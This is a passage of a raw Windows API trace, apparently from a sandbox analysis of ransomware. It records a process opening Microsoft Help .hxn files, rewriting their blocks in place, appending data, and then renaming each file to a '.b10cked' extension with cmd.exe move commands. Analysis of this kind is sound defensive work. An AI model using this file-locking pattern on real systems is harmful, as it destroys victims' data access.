dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" 
\"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xb8c, dwThreadId=0xa24)) returned 1 [0197.336] CloseHandle (hObject=0x1b4) returned 1 [0197.336] CloseHandle (hObject=0x120) returned 1 [0197.336] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.336] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.336] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x14c [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.518] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25430758791) returned 1 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.521] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14c [0197.521] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.521] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.521] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0197.522] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.522] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0197.522] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0197.523] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0197.523] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0197.523] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0197.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GROOVE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0197.528] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14c [0197.528] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.529] CloseHandle (hObject=0x120) returned 1 [0197.529] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN") returned 0x27 [0197.530] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.531] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"", 
lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x698, dwThreadId=0x62c)) returned 1 [0197.641] CloseHandle (hObject=0x1b4) returned 1 [0197.641] CloseHandle (hObject=0x120) returned 1 [0197.641] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.641] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.641] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.642] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25443137687) returned 1 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x158 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x158 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) 
returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.644] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.645] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.645] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.645] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.645] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.645] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.645] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0197.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, 
lpMultiByteStr=0x1328794, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0197.650] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x158 [0197.650] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.651] CloseHandle (hObject=0x120) returned 1 [0197.651] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN") returned 0x27 [0197.652] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.653] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 